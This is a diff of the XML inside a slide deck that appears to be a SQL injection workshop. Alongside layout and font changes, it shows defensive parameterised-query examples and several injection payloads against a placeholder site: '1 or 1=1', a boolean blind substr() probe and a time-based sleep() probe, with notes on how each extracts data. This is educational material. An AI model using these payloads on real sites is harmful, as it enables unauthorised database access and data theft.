+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="108" name="CustomShape 4"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1920240" y="2011680"/>
-            <a:ext cx="9052560" cy="572040"/>
+            <a:off x="4663440" y="2790000"/>
+            <a:ext cx="2742840" cy="456840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5780,37 +6829,23 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>run_query(‘select username, password from users where id = ?’, $username)</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="108" name="TextShape 5"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="109" name="CustomShape 5"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1554480" y="2628360"/>
-            <a:ext cx="10058400" cy="572040"/>
+            <a:off x="3197160" y="4775760"/>
+            <a:ext cx="6123960" cy="330840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5820,37 +6855,47 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>run_query(‘select username, password from users where id = :username:’, $username)</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="109" name="TextShape 6"/>
-          <p:cNvSpPr txBox="1"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1'+and+substr(user(),1,1)+=+'a</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="110" name="CustomShape 6"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3749040" y="4206240"/>
-            <a:ext cx="4846320" cy="572040"/>
+            <a:off x="2646000" y="3922560"/>
+            <a:ext cx="7315200" cy="365760"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5860,56 +6905,56 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>run_query(‘exec sp_get_user’, @username)</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Use these conditions to extract </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>information from the database.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="15" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="16" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -5932,14 +6977,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="110" name="CustomShape 1"/>
+          <p:cNvPr id="111" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3791160" y="3051360"/>
-            <a:ext cx="3502800" cy="364320"/>
+            <a:off x="2405520" y="3615840"/>
+            <a:ext cx="7979400" cy="463680"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5956,7 +7001,169 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1+and+if(mid(version(),1,1)+=+'5',+sleep(15),0) </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="112" name="CustomShape 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2742840" y="1661040"/>
+            <a:ext cx="7315200" cy="731520"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Used when there is no visual feedback.</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Uses the true/false condition, by triggering a long wait for true, and false returns instantly.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="113" name="CustomShape 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2773080" y="4942800"/>
+            <a:ext cx="7498440" cy="463680"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Both Blind SQL techniques are quite slow to extract information.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="114" name="CustomShape 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="182880" y="182880"/>
+            <a:ext cx="1671120" cy="363960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -5971,7 +7178,57 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>select dinner from mealtimes;</a:t>
+              <a:t>Blind SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="115" name="CustomShape 5"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5212080" y="914400"/>
+            <a:ext cx="2011320" cy="330840"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Time based blind</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -5981,33 +7238,14 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="17" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="18" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 

--- a/slides/SQLi-Preso.pptx
+++ b/slides/SQLi-Preso.pptx
@@ -2774,7 +2774,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="609480" y="273600"/>
-            <a:ext cx="10972080" cy="1144440"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2785,13 +2785,14 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Click to edit the title text format</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2810,7 +2811,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="609480" y="1604520"/>
-            <a:ext cx="10972080" cy="3976920"/>
+            <a:ext cx="10972440" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2833,12 +2834,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Click to edit the outline text format</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2855,12 +2856,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Second Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2877,12 +2878,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Third Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2899,12 +2900,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Fourth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2921,12 +2922,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Fifth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2943,12 +2944,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Sixth Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -2965,12 +2966,12 @@
               <a:buChar char=""/>
             </a:pPr>
             <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                 <a:latin typeface="Arial"/>
               </a:rPr>
               <a:t>Seventh Outline Level</a:t>
             </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
@@ -3282,7 +3283,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1523880" y="1122480"/>
-            <a:ext cx="9142920" cy="2386440"/>
+            <a:ext cx="9142560" cy="2386080"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3333,7 +3334,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1523880" y="3602160"/>
-            <a:ext cx="9142920" cy="1654560"/>
+            <a:ext cx="9142560" cy="1654200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3391,7 +3392,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="8229600" y="6208560"/>
-            <a:ext cx="3961440" cy="648360"/>
+            <a:ext cx="3961080" cy="648000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3440,7 +3441,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="400680" y="246600"/>
-            <a:ext cx="3183840" cy="363960"/>
+            <a:ext cx="3183480" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3491,7 +3492,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4663440" y="1280160"/>
-            <a:ext cx="2694960" cy="330840"/>
+            <a:ext cx="2694600" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3523,6 +3524,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Parameterised Queries!</a:t>
             </a:r>
@@ -3541,7 +3543,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4846320" y="3566160"/>
-            <a:ext cx="4480200" cy="330840"/>
+            <a:ext cx="4479840" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3573,6 +3575,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Stored Procedures!</a:t>
             </a:r>
@@ -3591,7 +3594,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="1920240" y="2011680"/>
-            <a:ext cx="9052200" cy="571680"/>
+            <a:ext cx="9051840" cy="571320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3623,6 +3626,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>run_query(‘select username, password from users where id = ?’, $username)</a:t>
             </a:r>
@@ -3641,7 +3645,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2052720" y="2714760"/>
-            <a:ext cx="8229600" cy="571680"/>
+            <a:ext cx="8229240" cy="571320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3673,6 +3677,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>run_query(‘select username, password from users where id = :id:’, $id)</a:t>
             </a:r>
@@ -3691,7 +3696,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="3749040" y="4206240"/>
-            <a:ext cx="4845960" cy="571680"/>
+            <a:ext cx="4845600" cy="571320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3723,6 +3728,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>run_query(‘exec sp_get_user’, @username)</a:t>
             </a:r>
@@ -3771,7 +3777,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4511160" y="3051360"/>
-            <a:ext cx="3502440" cy="363960"/>
+            <a:ext cx="3502080" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3852,7 +3858,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="3375720" y="1951920"/>
-            <a:ext cx="4747680" cy="2558520"/>
+            <a:ext cx="4747320" cy="2558160"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4092,8 +4098,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3769560" y="493200"/>
-            <a:ext cx="3837960" cy="363960"/>
+            <a:off x="4300560" y="493200"/>
+            <a:ext cx="3837600" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4128,6 +4134,323 @@
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>select solutions from workshops;</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="CustomShape 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2194560" y="1008000"/>
+            <a:ext cx="7680960" cy="1552320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Inband SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Payload: 1 or 1=1 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>(Returns all rows)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="CustomShape 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="4297680"/>
+            <a:ext cx="10972800" cy="1188720"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
